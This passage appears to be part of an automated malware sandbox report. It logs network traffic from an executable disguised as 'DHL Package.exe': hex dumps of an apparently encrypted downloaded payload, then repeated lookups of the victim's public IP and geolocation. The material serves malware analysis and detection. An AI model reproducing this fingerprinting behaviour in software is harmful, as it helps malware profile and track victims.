                                                                                              Data Ascii: T^}Ek!|5~Q)DC4r)KWe:q6v\@qN4!/{%`$hHl&9*sEHL&Y*LGWSlB$+Q=I|`}+anU%6R5).LGkAwiiR'iP>-r
                                                                                              Aug 7, 2024 09:28:15.600583076 CEST1289INData Raw: 3a e7 1e fa 5c da 2d 2a b7 26 8c f8 1e 92 90 1d 0a 03 67 80 b2 44 12 80 fe 8e 53 dc f1 90 ff 40 e2 89 ed c0 2f 70 31 43 9d f8 2b d4 01 8f 12 fc 62 39 33 28 81 7f bc bd 21 0f fd 76 c8 55 7e 80 48 56 bb f7 a3 8a a9 95 d8 13 4c 15 9a ae 37 28 40 86
                                                                                              Data Ascii: :\-*&gDS@/p1C+b93(!vU~HVL7(@!CwEU_Ljy/3BhhLDXk/J&zL@?aL08n^WwU!B%rJp|%p(J*}'\FTuB.qy(`AbruCKq
                                                                                              Aug 7, 2024 09:28:15.600677967 CEST1289INData Raw: 52 7f e2 15 3d 52 8f cc 24 5a bb fe d3 68 12 57 ec 50 10 39 21 81 6d 2c 79 ee 85 cc e2 ed c1 04 c9 e6 80 9d 6e 85 d8 bd 6a 30 d6 6d 0b 17 74 6b 38 77 c3 53 81 be 0b db 35 6d 95 5c b4 c9 b8 b4 19 81 5a 70 b8 ff 5a c7 07 4d 75 d7 d9 9f bf 6e d6 51
                                                                                              Data Ascii: R=R$ZhWP9!m,ynj0mtk8wS5m\ZpZMunQy2Q7~aYXsyZDBl\0iZ;q|bf1E*p]?%A*!x#Z}zs|,)hIj",8/E.xU(@-MARfdox@9i]H'sKm@
                                                                                              Aug 7, 2024 09:28:15.602659941 CEST1289INData Raw: 4c b6 50 53 5f 2b 37 7b ff b0 f2 63 ec 17 9d ae dd 3c 50 bd 80 d3 1b e2 a7 57 14 fe 93 08 c2 da 37 23 2f eb fd 61 ee a5 76 c8 f2 80 09 84 3c 6d ff e8 07 d9 c0 de 06 0a f4 37 85 17 f4 e0 80 e6 3e 9c 34 a5 cc 09 75 14 03 00 85 99 1b 9d 53 2c df 83
                                                                                              Data Ascii: LPS_+7{c<PW7#/av<m7>4uS,I%mI!xD3;G#X~h-2>jsbA`4lon\S>Yb`&i~foPWQ1KDl5;u8qIBbMCQymTu{@(s*X]3*
                                                                                              Aug 7, 2024 09:28:15.602754116 CEST1289INData Raw: 7e e0 ed 6c cc 40 2e d9 91 98 c2 52 e9 21 fd 70 66 bb 2d 58 5b a1 e7 17 b0 72 aa 8b e0 e1 bc e7 5e c8 5c c4 65 da a1 76 e0 40 ed ba 11 b7 aa 65 75 1e a0 20 b1 a1 25 25 9e aa 76 a1 98 0c 1c f7 f9 0a 9c 80 0a 95 b8 74 98 20 5f f9 31 33 0f 8e f8 59
                                                                                              Data Ascii: ~l@.R!pf-X[r^\ev@eu %%vt _13YhH@<}ERwrj F(@G&VN^Y2[)kcEU!x+'DZkh\t6*"^;tbH`eA
                                                                                              Aug 7, 2024 09:28:15.604878902 CEST1289INData Raw: 23 60 8c b3 44 07 9a ff 8e 58 c7 c1 95 f0 cd e2 98 ed a5 25 70 20 47 97 a0 a3 d2 2b 85 0a bf ea 39 38 22 8d 0d 9e bc 21 6e f0 40 5b 03 7e 86 43 6e bf f9 a1 00 ba a5 d1 10 18 6e 9a ae 35 47 cb 97 53 e6 de 72 cf c0 4e da 5b d2 20 87 5d 12 09 a5 8d
                                                                                              Data Ascii: #`DX%p G+98"!n@[~Cnn5GSrN[ ]"mhhjTahSIFhr!`.-ww-[B#x4?v{>D(?QZF!uDk(rQ&,7h58kF!w:P(.\5>al>{2E
                                                                                              Aug 7, 2024 09:28:15.604979992 CEST1289INData Raw: 51 22 25 1d 1d 4e 15 7f e2 9d 65 e2 00 cb 22 d8 f1 96 0c 52 87 f3 9f 28 35 c0 fd 23 33 8a 61 2a 77 ba 2e 44 ab 0f 25 33 d1 4f 51 a8 d7 ce b2 5f 81 33 6f c2 f9 35 6b 03 5c 7b 5e b1 e0 a7 7f db 16 81 32 51 be a2 a4 26 7b e1 a5 6d 48 96 dd 10 0e 73
                                                                                              Data Ascii: Q"%Ne"R(5#3a*w.D%3OQ_3o5k\{^2Q&{mHssX~k-j~eDR)]8hf Fu=C~N6AX|n^6a4ffOBB!J_N(@-m%Y#der__O7H9Dv"vS]N"s
                                                                                              Aug 7, 2024 09:28:15.606971025 CEST1289INData Raw: 6d 22 0c 85 d4 19 6b 94 48 36 e3 f5 01 c2 a0 98 74 1d b9 8f cc f4 a1 0f 05 7b 9f 5d fc c6 63 d4 80 b4 fb b0 26 74 f3 f7 43 8a b5 d1 fe c5 9c 28 9e 5b 7b 6e 2c 60 50 75 15 9e 9e 04 90 76 33 8d e2 67 96 2c 81 14 b2 29 30 8b 06 0c 33 6d 6e e0 ab 4a
                                                                                              Data Ascii: m"kH6t{]c&tC([{n,`Puv3g,)03mnJNq<X3DL2 ~KA+27='_yN~ 4b!tf#"1r7?;K2X>QqK^Ti,O 2f6hzCZjsa/Xd54
                                                                                              Aug 7, 2024 09:28:15.607065916 CEST1289INData Raw: 6d 7a 4b 53 b6 fc 34 62 7c d1 52 36 ed be f3 df b0 af af b9 d3 b0 75 dc e9 b5 a0 39 b5 da 3e 7b 1e a0 37 99 e8 34 25 96 f0 32 b9 98 76 e1 4e ef f4 94 e4 dc 99 b0 52 94 76 2d f9 31 3d 13 1e f8 59 ba 7b 58 df c8 4a 26 13 48 98 0f 0e 35 a5 ef d5 d3
                                                                                              Data Ascii: mzKS4b|R6u9>{74%2vNRv-1=Y{XJ&H53X3wVzED<$|X!MP1qS4})aEQAx=YA|QIkO]9{X(i/O+:* G/)WgpEun+.?N
                                                                                              Aug 7, 2024 09:28:15.832040071 CEST1289INData Raw: 9f ab 3c 70 41 6f dd d3 2b d8 89 9b 15 d8 4b 8e 38 28 8b 0b 37 bd 21 1f f6 5e d1 27 2d 91 42 0d d4 49 89 8a b0 a5 dc 6d 5c 16 9a aa 41 04 40 97 57 9f 74 77 de cf 37 71 5f c4 34 af af 22 09 af 89 fc d1 d4 6a ea 64 b7 6a e4 da 26 8d fb f7 1e 61 de
                                                                                              Data Ascii: <pAo+K8(7!^'-BIm\A@Wtw7q_4"jdj&a&XBlNrLj2nS_S'}+B~9?P&p(#26Q-IB'ZuPD87saT,7{`saA#o(tZ:C)p5%7/wJQnDCe3>fd


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.11.2049741132.226.247.73804252C:\Users\user\Desktop\DHL Package.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Aug 7, 2024 09:28:17.469244957 CEST151OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Connection: Keep-Alive
                                                                                              Aug 7, 2024 09:28:17.800096035 CEST324INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:17 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 107
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 89019246474c92dab75ab264f6a1fe46
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>
                                                                                              Aug 7, 2024 09:28:17.825790882 CEST127OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Aug 7, 2024 09:28:18.156982899 CEST324INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:17 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 107
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 7b4c4782f8abbc616f23ec3878135404
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>
                                                                                              Aug 7, 2024 09:28:19.693484068 CEST127OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Aug 7, 2024 09:28:20.025669098 CEST324INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:19 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 107
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: a8f1c708ccea8c194751045ac5dd83c0
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>
                                                                                              Aug 7, 2024 09:28:20.755336046 CEST127OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Aug 7, 2024 09:28:21.088993073 CEST324INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:20 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 107
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 5a317810e1b1195dcd9bde0de0aa7e52
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>
                                                                                              Aug 7, 2024 09:28:21.810622931 CEST127OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Aug 7, 2024 09:28:22.142910004 CEST324INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:21 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 107
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 9913221286d3d865c545e310d3363229
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>
                                                                                              Aug 7, 2024 09:28:22.865736008 CEST127OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Aug 7, 2024 09:28:23.197529078 CEST324INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:23 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 107
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: f4bd2380ee8f88f5c239a68ac54fd497
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>
                                                                                              Aug 7, 2024 09:28:23.932697058 CEST127OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Aug 7, 2024 09:28:24.264518023 CEST324INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:24 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 107
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 01f040bd0228855b228d9cb6f3e45b26
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>
                                                                                              Aug 7, 2024 09:28:24.989842892 CEST127OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Aug 7, 2024 09:28:25.339840889 CEST324INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:25 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 107
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 63dc0a2da75cd6fdf4946de1351af56a
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>
                                                                                              Aug 7, 2024 09:28:26.063566923 CEST127OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                              Host: checkip.dyndns.org
                                                                                              Aug 7, 2024 09:28:26.395008087 CEST324INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:26 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 107
                                                                                              Connection: keep-alive
                                                                                              Cache-Control: no-cache
                                                                                              Pragma: no-cache
                                                                                              X-Request-ID: 0ac295c22cd98eaabe2609d246b8aa79
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.252.169</body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.11.2049742172.67.177.1344434252C:\Users\user\Desktop\DHL Package.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-08-07 07:28:19 UTC88OUTGET /xml/102.129.252.169 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              Connection: Keep-Alive
                                                                                              2024-08-07 07:28:19 UTC705INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:19 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: MISS
                                                                                              Last-Modified: Wed, 07 Aug 2024 07:28:19 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AVqyU2Lob6FkMaR%2BWdqpshCvB2I7pWKVXW7RyCrKFzHxYZo2xQv65ksj4UO3oeEKflMjFXINV3%2Bv3HC6%2Bqn4uHlMyVsnjcM%2FZiXMMc8IlK0%2FcQK%2BGVgWi%2BgZRltQ%2BzDErRpMvjIz"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8af58c99baf5159a-SJC
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-08-07 07:28:19 UTC381INData Raw: 31 37 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                              Data Ascii: 176<Response><IP>102.129.252.169</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90002</ZipCode><TimeZone>America/Los
                                                                                              2024-08-07 07:28:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.11.2049743172.67.177.1344434252C:\Users\user\Desktop\DHL Package.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-08-07 07:28:20 UTC64OUTGET /xml/102.129.252.169 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              2024-08-07 07:28:20 UTC700INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:20 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 1
                                                                                              Last-Modified: Wed, 07 Aug 2024 07:28:19 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sIjDYHFguCnhflF8Ik0IgTYTeYHGe25k2pw4GrIcxkA5aYH4QXGf8TOBsNJD8FYQ7iHFyXM%2Bu232Gcz4dlM6VjTavI6DV1ULQBr09989Zlxn3%2FKUCu8D8Qv2o0jfeK3kPQQCLeLc"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8af58ca128ebf98f-SJC
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-08-07 07:28:20 UTC381INData Raw: 31 37 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                              Data Ascii: 176<Response><IP>102.129.252.169</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90002</ZipCode><TimeZone>America/Los
                                                                                              2024-08-07 07:28:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.11.2049744172.67.177.1344434252C:\Users\user\Desktop\DHL Package.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-08-07 07:28:21 UTC64OUTGET /xml/102.129.252.169 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              2024-08-07 07:28:21 UTC708INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:21 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 2
                                                                                              Last-Modified: Wed, 07 Aug 2024 07:28:19 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bqIAykXX9%2BaXkA70%2Fx8o5iUx%2Bm3WhYzZCmo3urIct6zEF0xGRP3svuj4WBtD04LBJarcB8hbpWrmp%2FV7WoZrlXMThsEkMOaoyOo0OAo2%2Ftf6qxubbg4k6BBihPeIQEMH%2FkCeUELH"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8af58ca7cd1515a4-SJC
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-08-07 07:28:21 UTC381INData Raw: 31 37 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 32 35 32 2e 31 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                                              Data Ascii: 176<Response><IP>102.129.252.169</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90002</ZipCode><TimeZone>America/Los
                                                                                              2024-08-07 07:28:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.11.2049745172.67.177.1344434252C:\Users\user\Desktop\DHL Package.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-08-07 07:28:22 UTC64OUTGET /xml/102.129.252.169 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              2024-08-07 07:28:22 UTC700INHTTP/1.1 200 OK
                                                                                              Date: Wed, 07 Aug 2024 07:28:22 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 3
                                                                                              Last-Modified: Wed, 07 Aug 2024 07:28:19 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uDGp67EKEerd2i3EB1BJ5YyJOsG9Wp3mvLvQ7DcJl2F4kdpLZ9HKl3Lh91zSz2xl%2BbbKv0rZkCF1Pl1OH%2FBv1UA5mgwPPfZeLBVWC6aX7hRtumMX7DpCbri11PkWfbmvYCamiR2x"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8af58cae5c33d02d-SJC
                                                                                              alt-svc: h3=":443"; ma=86400
